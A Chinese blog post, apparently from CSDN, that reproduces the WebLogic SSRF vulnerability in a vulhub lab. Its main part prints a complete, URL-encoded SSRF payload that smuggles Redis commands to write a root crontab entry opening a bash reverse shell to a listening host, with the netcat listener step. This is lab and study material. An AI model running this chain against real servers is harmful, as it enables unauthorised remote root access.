记一次vulhub靶场复现Weblogic SSRF漏洞

最新推荐文章于 2024-04-23 10:22:31 发布
最新推荐文章于 2024-04-23 10:22:31 发布
阅读量193 收藏 1
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53622191/article/details/132231120
版权

要复现的就是这个靶场了,为了弄清一下通过ssrf漏洞来getshell的过程
在这里插入图片描述

准备

我是基于kali上安装好了vulhub和docker环境开始的喔
攻击机就是我的物理机:ip:192.168.20.1
靶机就是我的kali虚拟了:ip:192.168.160.128

然后因为反弹shell,要监听端口的原因,需要在物理机上安装一下netcat
安装步骤的话
netcat官网下载地址
点netcat 1.12下载到一个自己的目录下解压就行
在这里插入图片描述
也不用添加环境变量,如果要运行的话,进入到下载目录,在地址栏输入cmd就可以使用nc命令了
在这里插入图片描述在这里插入图片描述

启动环境开始

环境启动环节
在这里插入图片描述
在这里有遇到一个小问题,就是启动之后,会发现redis其实没启动起来,后面的端口号没有显示,是空白的。后来找到了原因,参考了一下这个:[kali docker无法启动Redis_ (/vulhub/weblogic/ssrf),JBoss(jboss/CVE-2017-12149)无法启动环境(https://blog.csdn.net/weixin_43886198/article/details/111144854?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169172528916800182153891%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=169172528916800182153891&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allfirst_rank_ecpm_v1~rank_v31_ecpm-14-111144854-null-null.142%5Ev92%5EchatsearchT3_1&utm_term=vulhub%20weblogic%20ssrf&spm=1018.2226.3001.4187)

调整之后重启kali,再按步骤启动环境就正常了。

查看一下redis所在的服务地址和端口

docker ps -a

在这里插入图片描述

docker inspect ssrf_redis_1

在这里插入图片描述

漏洞利用

用 http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp 来访问漏洞页面
在这里插入图片描述
payload大概就是这样,直接在地址栏输入,改一下后面的ip和端口号

http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://攻击机ip:端口

看页面的报错信息

当你的ip不存在时,他页面的返回结果是这个样子的
在这里插入图片描述

当ip存在,端口不存在时,是这个样子的
在这里插入图片描述
当ip和端口都存在,他是这个样子的
在这里插入图片描述

反弹shell

命令

#写入文件名,这里我叫stest
#set  xx   "\n* * * * * bash -i >& /dev/tcp/反弹shell的ip地址/监听端口 0>&1\n"
test

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.20.1/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

aaa

Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。

进行url编码:

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.20.1%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

拼接payload,记得改一下自己的ip和端口

http://靶机ip:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://攻击机ip:端口/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.20.1%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

这就是文件写入成功了
在这里插入图片描述

监听端口

在攻击机上监听一下你填写的端口,我这里是4444

可以看到已经反弹过来了
在这里插入图片描述

参考:添加链接描述

吾易烦
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SSRF——weblogic vulhub 漏洞及内网redis反弹shell
weixin_43774222的博客
03-17 6450
一、概述 SSRF( Server-side Request Forgery )服务端请求伪造。 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。 主要攻击手段 1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息; 2.攻击运行在内网或本地的应用程序(比如溢出); 3.对内网web应用进行指纹识别,通过访问默认文件实
WebLogic SSRF漏洞
11-25
WebLogic SSRF漏洞方法 CVE-2014-4210 10.0.2,10.3.6
漏洞——vulhub中的SSRF漏洞
qq_52666132的博客
07-07 868
vulhubssrf漏洞
[ vulhub漏洞篇 ] vulhub 漏洞集合(含漏洞文章连接)
最新发布
小司机的奥拓
04-23 1607
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。计划:这里录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部,欢迎持续订阅我也会不定期再中间更新文章链接目的:以 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者。
漏洞篇——利用vulhub模拟WeblogicSSRF漏洞
爱国小白帽
01-15 3174
SSRF漏洞SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。...
服务端请求伪造(SSRF)及漏洞
weixin_58954236的博客
09-05 2100
服务器会根据用户提交的URL 发送一个HTTP 请求。使用用户指定的URL,Web 应用可以获取图片或者文件资源等。典型的例子是百度识图功能。如果没有对用户提交URL 和远端服务器所返回的信息做合适的验证或过滤,就有可能存在“请求伪造”的缺陷。“请求伪造”,顾名思义,攻击者伪造正常的请求,以达到攻击的目的。如果“请求伪造”发生在服务器端,那这个漏洞就叫做“服务器端请求伪造”,英文名字Server Side Request Forgery,简称SSRF
Weblogic SSRF漏洞
weixin_43886198的博客
12-23 367
Weblogic SSRF漏洞 漏洞描述 Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 漏洞危害等级 高危 影响版本 weblogic_10.3.6.0 漏洞 基础环境 组件 版本 vulhub /vulhub/weblogic/ssrf weblogic 10.3.6.0 管理控制台 http://10.9.11.12:7001/console/login/LoginForm.jsp w
WebLogic SSRF And XSS检查利用工具.exe
08-11
非常简单方便/实用的WebLogic SSRF And XSS检查利用工具
weblogic 漏洞统计 CVE
09-18
WebLogic 是一款由甲骨文公司提供的企业级应用服务器,用于构建、部署和管理Java EE应用程序。然而,如同任何杂的软件系统,WebLogic也存在安全漏洞,这些漏洞可能被恶意攻击者利用,对服务器造成严重威胁。以下是...
雷石weblogic漏洞扫描工具
08-27
雷石weblogic漏洞扫描工具
weblogic相关漏洞
05-03
CVE-2017-10271 是一个在 WebLogic 服务器中发的远程代码执行漏洞,影响范围包括 WebLogic 10.3.6.0.0、12.1.3.0.0、12.2.1.4.0、14.1.1.0.0 等版本。该漏洞是由于 WebLogic 的 WLS WS-AT coordinator 组件中的一...
Vulhub漏洞
weixin_45995579的博客
09-30 1703
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
vulhub漏洞】Fastjson 1.2.24反序列化漏洞
RexHa的博客
03-06 3659
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。 漏洞成因: 目标网站在解析 json 时,未对 json 内容进行验证,直接将 json 解析成 java 对象并执行,攻击者构造对应的 payload ,让系统执行,就能达到代码执行,甚至命令执行的目的。
Apache HTTP Server SSRF漏洞(CVE-2021-40438)vulhub
qq_51398553的博客
06-21 1632
在反向代理模式下,客户端不知道真正的服务器是谁,只是向代理服务器发送请求,代理服务器再根据自己的策略将请求转发到目标服务器,目标服务器返回数据给代理服务器,代理服务器再将数据返回给客户端。2.在unix:与|之间输入的长度大概是4092个字符(多于4092个字符可以,少于也可以,但不能少于一定的字符,上面的是不能4069个字符,其他的没有实验,有知道的可以告诉我一下原因哈),即可构造出uds_path为null,让Apache不再发送请求给unix套接字。,拉取镜像,并查看服务相关信息。
基于SSRF漏洞引发的CRLF之(session会话固定+XSS)组合拳利用思路
yuan_boss的博客
09-06 1936
Weblogic SSRF漏洞。其中涉及到了注入HTTP头,利用Redis获得反弹shell,这里引发了我的一些思考,因此我写下了这篇文章。​我的思考主要起源于:为什么我们在SSRF的利用中,使用http协议能对redis直接进行操作?
vulhub-SSRF服务端请求伪造漏洞
m0_58265086的博客
09-04 73
制后如下图,发送数据包。
Vulhub漏洞环境搭建流程(1),2024年最新字节跳动网络安全岗面试题
04-15 275
(列出运行中的容器,此时靶机在ID为:3be91cb2f1f5 的容器中运行,服务端口号为8161)(2)浏览器访问靶机(虚拟机IP地址+端口号),至此,漏洞环境已经成功搭建。1.退出靶机回到虚拟机,不关闭容器(不删除环境)2.退出靶机回到虚拟机,并且关闭容器,删除环境。(2)docker命令关闭容器,删除漏洞环境。(1)终端docker命令进入靶机。(2)docker命令回到靶机中。(1)命令exit退出靶机。(1)命令exit退出靶机。(2)docker命令。
vulhub漏洞】redis 4-unacc 未授权访问漏洞
m0_59598029的博客
01-31 1028
第一次看使用公私钥ssh免密登录的过程还有计时任务反弹的过程网络安全真是学无止境。
vulhub weblogic ssrf漏洞
03-16
vulhub weblogic ssrf漏洞是指在WebLogic服务器中存在一种安全漏洞,攻击者可以利用该漏洞来发起服务器端请求伪造(SSRF)攻击。攻击者可以利用该漏洞来访问受保护的内部网络资源,或者利用该漏洞来发起其他攻击,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值